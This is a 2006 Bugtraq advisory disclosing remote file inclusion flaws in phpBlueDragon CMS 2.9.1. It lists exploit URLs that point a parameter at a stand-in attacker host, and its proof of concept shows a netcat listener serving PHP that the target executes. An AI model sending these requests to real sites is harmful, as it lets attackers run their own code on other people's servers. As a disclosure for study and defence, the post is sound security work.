| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060622073509.21924.qmail@securityfocus.com>
Date: 22 Jun 2006 07:35:09 -0000
From: rozowa.landrynka@...m.nation.pl
To: bugtraq@...urityfocus.com
Subject: phpBlueDragon CMS 2.9.1 multiple remote file inclusion vuln
PHPBlueDragon CMS <= 2.9.1 http://phpbluedragon.net/
Affected files:
root_includes/root_modules/team_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/ root_includes/root_modules//rss_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/ root_includes/root_modules/manual_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/ root_includes/root_modules/forum_admin.php?action=group_move&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/ root_includes/root_modules/forum_admin.php?action=forum_move&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/
Solution:
None
Simple PoC:
nc -l -p 9999
...
http://some.site/root_includes/root_modules/forum_admin.php?action=forum_move&template_redirect=yes&vsDragonRootPath=http://192.168.0.xx:9999/
...
$ nc -l -p 9999
GET /public_includes/pub_kernel/pbd_move. HTTP/1.0
Host: 192.168.0.xx:9999
HTTP/0.9 200 OK
<?php phpinfo(); ?>
...
System OpenBSD xxx 3.9 xxx i386
...
Credits:
shm
Powered by blists - more mailing lists